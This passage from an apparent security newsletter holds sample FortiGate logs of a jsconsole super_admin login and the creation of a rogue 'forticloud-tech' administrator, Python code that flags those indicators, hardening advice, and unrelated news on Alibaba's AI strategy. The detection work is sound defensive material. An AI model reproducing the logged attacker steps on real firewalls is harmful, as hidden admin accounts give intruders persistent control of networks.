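date=2025-02-03 time=09:14:22 devname="FGT-EDGE" type="event" subtype="system" level="information" vd="root" logdesc="Admin login successful" user="admin" ui="jsconsole" method="jsconsole" srcip=1.1.1.1 dstip=1.1.1.1 action="login" status="success" profile="super_admin" msg="Administrator admin logged in successfully from jsconsole"
date=2025-02-03 time=09:14:40 devname="FGT-EDGE" type="event" subtype="system" level="information" vd="root" logdesc="Object attribute configured" user="admin" ui="jsconsole" action="Add" cfgpath="system.admin" cfgobj="forticloud-tech" cfgattr="accprofile[super_admin]" msg="Add system.admin forticloud-tech"
date=2025-02-03 time=09:20:00 devname="FGT-EDGE" type="event" subtype="system" level="information" vd="root" logdesc="Admin login successful" user="netops" ui="https(10.0.0.5)" method="https" srcip=10.0.0.5 dstip=10.0.0.1 action="login" status="success" profile="super_admin" msg="Administrator netops logged in successfully from https(10.0.0.5)"
date=2025-02-03 time=09:21:10 devname="FGT-EDGE" type="event" subtype="system" level="information" vd="root" logdesc="Admin login failed" user="admin" ui="https(198.51.100.23)" method="https" srcip=198.51.100.23 dstip=10.0.0.1 action="login" status="failed" msg="Administrator admin login failed from https(198.51.100.23)"
"""


def parse_fortigate(line):
    """Turn one key=value line into a dict, stripping the quotes."""
    return {key: value.strip('"') for key, value in KV_RE.findall(line)}


def _trusted(ip_text, networks):
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return any(ip in net for net in networks)


def triage(log_text, networks=TRUSTED_MGMT):
    """Return (severity, time, description) for events matching the indicators."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_fortigate(line)
        if rec.get("type") != "event" or rec.get("subtype") != "system":
            continue
        src, dst = rec.get("srcip", ""), rec.get("dstip", "")
        login_ok = rec.get("action") == "login" and rec.get("status") == "success"
        # Indicator 1: jsconsole login from outside management, or with srcip == dstip
        # (the spoofed-looking addresses seen in exploitation).
        if login_ok and rec.get("ui") == "jsconsole" and (not _trusted(src, networks) or src == dst):
            findings.append(("high", rec["time"], f"jsconsole login as {rec.get('user')} from {src}"))
        # Indicator 2: a new local administrator account.
        if rec.get("action") == "Add" and rec.get("cfgpath") == "system.admin":
            findings.append(("high", rec["time"],
                             f"admin account '{rec.get('cfgobj')}' created via {rec.get('ui')}"))
        # Context: failed logins from untrusted sources, for correlation only.
        if rec.get("action") == "login" and rec.get("status") == "failed" and not _trusted(src, networks):
            findings.append(("low", rec["time"], f"failed login as {rec.get('user')} from {src}"))
    return findings
```

The same loop extends naturally to the other configuration changes Forescout describes for this intrusion set, such as new firewall policies or VPN user additions made by an account that was itself created minutes earlier; filter on cfgpath and correlate by user. If the management interface is reachable from the internet at all, patching alone is not enough: restrict it to the trusted networks and remove any administrator account you did not create.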
READ THE STORY: The Record
Items of interest
Jack Ma’s AI Pivot Revives Alibaba’s Fortunes
Bottom Line Up Front (BLUF): Alibaba is experiencing a remarkable turnaround after shifting its focus to artificial intelligence (AI) under the quiet leadership of Jack Ma. The company has invested heavily in AI startups, chips, and research, positioning its Qwen large language model (LLM) as a leader in China. Apple has even selected Qwen for AI functions on iPhones in China. As a result, Alibaba's stock has surged 66% since the beginning of 2025, and Ma has been publicly welcomed back by Chinese leadership.
Analyst Comments: The company’s aggressive investments in AI infrastructure, cloud computing, and LLMs indicate a long-term commitment to competing with ByteDance, Tencent, and DeepSeek. However, maintaining its lead will be challenging as geopolitical tensions and domestic competition continue to shape the AI landscape. Alibaba’s success depends on its ability to commercialize AI applications and sustain government support.
FROM THE MEDIA: Alibaba’s AI transformation began in late 2022 when Jack Ma recognized the disruptive potential of AI after the launch of ChatGPT. Since then, the company has expanded its AI research teams, invested billions in chip acquisitions, and backed AI startups like Moonshot, MiniMax, and Zhipu. Its AI model, Qwen, has gained traction, and Apple’s decision to integrate Qwen into iPhones in China has further validated Alibaba’s AI capabilities. CEO Eddie Wu has spearheaded Alibaba’s AI expansion, reallocating resources from brick-and-mortar businesses to AI-driven initiatives. The company plans to spend $53 billion on AI infrastructure over the next three years, focusing on training models, AI cloud services, and consumer-facing applications. While Alibaba is currently a dominant AI player in China, it faces growing competition from Tencent, ByteDance, and emerging AI startups.
READ THE STORY: FT
What REALLY Happened To Jack Ma & Alibaba? (Video)
FROM THE MEDIA: The story of Jack Ma and of Alibaba. Today we know him as Jack Ma, but when he was born in China in 1964 he was called Yun Ma; it was a foreign tourist who suggested he use the English name Jack. Ma's beginnings were humble, which makes the story of how he built Alibaba from nothing into a company worth billions of dollars remarkable. Alibaba's 2014 listing was the largest IPO in history at the time.
Jack Ma and Elon Musk hold debate in Shanghai (Video)
FROM THE MEDIA: Alibaba co-founder and executive chairman Jack Ma and Tesla CEO Elon Musk hold a debate in Shanghai over artificial intelligence.
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.